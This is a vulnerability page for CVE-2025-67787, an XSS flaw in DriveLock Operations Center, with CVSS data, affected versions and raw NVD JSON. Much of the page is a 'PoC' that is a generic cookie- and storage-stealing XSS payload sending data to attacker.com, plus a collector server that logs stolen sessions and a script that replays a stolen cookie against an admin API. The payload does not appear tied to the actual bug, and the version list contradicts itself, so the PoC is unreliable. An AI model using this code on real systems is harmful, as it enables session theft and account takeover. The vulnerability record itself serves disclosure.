Security Vulnerability Report
CVE-2025-67787 CVSS 9.6 CRITICAL

CVE-2025-67787

Published: 2025-12-17 20:15:57
Last Modified: 2026-01-02 15:55:02

Description

An issue was discovered in 25.1.2 before 25.1.5. A Cross Site Scripting (XSS) issue in DriveLock Operations Center allows for session takeover over a network.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:drivelock:drivelock:25.1.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:drivelock:drivelock:25.1.4:*:*:*:*:*:*:* - VULNERABLE
DriveLock Operations Center < 25.1.2
DriveLock Operations Center 25.1.2
DriveLock Operations Center 25.1.3
DriveLock Operations Center 25.1.4
DriveLock Operations Center >= 25.1.2 and < 25.1.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-67787 PoC - DriveLock Operations Center XSS Session Hijacking
// Author: Security Researcher
// Date: 2025-12-17

// Malicious payload to be injected into DriveLock Operations Center input fields
const xssPayload = `<script>
  // Steal session cookie and send to attacker's server
  var stolenCookie = document.cookie;
  var attackerServer = 'https://attacker.com/collect';

  // Create image object to send cookie silently
  var img = new Image();
  img.src = attackerServer + '?cookie=' + encodeURIComponent(stolenCookie) + '&location=' + encodeURIComponent(window.location.href);

  // Alternative: Use fetch API for more reliable exfiltration
  fetch(attackerServer + '/log', {
    method: 'POST',
    mode: 'no-cors',
    body: JSON.stringify({
      cookie: stolenCookie,
      sessionStorage: JSON.stringify(sessionStorage),
      localStorage: JSON.stringify(localStorage),
      referrer: document.referrer,
      timestamp: new Date().toISOString()
    })
  });
</script>`;

// Attacker's server-side collector (example in Node.js)
/*
const express = require('express');
const app = express();

app.get('/collect', (req, res) => {
  console.log('Stolen Cookie:', req.query.cookie);
  console.log('Location:', req.query.location);
  res.send('OK');
});

app.post('/log', (req, res) => {
  let data = '';
  req.on('data', chunk => data += chunk);
  req.on('end', () => {
    console.log('Stolen Data:', data);
    fs.appendFileSync('stolen_sessions.log', data + '\n');
  });
  res.send('OK');
});

app.listen(8080);
*/

// Session hijacking attack using stolen cookie
/*
const https = require('https');

function hijackSession(targetUrl, stolenCookie) {
  const options = {
    hostname: new URL(targetUrl).hostname,
    port: 443,
    path: '/OperationsCenter/api/admin/config',
    method: 'GET',
    headers: {
      'Cookie': stolenCookie,
      'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
      'Accept': 'application/json'
    }
  };

  const req = https.request(options, (res) => {
    let data = '';
    res.on('data', chunk => data += chunk);
    res.on('end', () => {
      console.log('Session Valid! Response:', data);
      // Now attacker has full admin access
    });
  });

  req.on('error', (e) => {
    console.error('Error:', e.message);
  });

  req.end();
}

// Usage: hijackSession('https://drivelock-server.local', 'ASP.NET_SessionId=abc123...');
*/

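References

https://drivelock.help/versions/current/web/en/releasenotes/Content/ReleaseNotes_DriveLock/SecurityBulletins/25-002-CrossSiteScripting.htm (Vendor Advisory)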

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67787", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:57.040", "lastModified": "2026-01-02T15:55:01.953", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in 25.1.2 before 25.1.5. A Cross Site Scripting (XSS) issue in DriveLock Operations Center allows for session takeover over a network."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:drivelock:drivelock:25.1.2:*:*:*:*:*:*:*", "matchCriteriaId": "3A38F1A2-8F5A-4B84-8468-0D79719C0715"}, {"vulnerable": true, "criteria": "cpe:2.3:a:drivelock:drivelock:25.1.4:*:*:*:*:*:*:*", "matchCriteriaId": "94B8CA80-9694-4A8E-9DE8-D7A736827093"}]}]}], "references": [{"url": "https://drivelock.help/versions/current/web/en/releasenotes/Content/ReleaseNotes_DriveLock/SecurityBulletins/25-002-CrossSiteScripting.htm", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}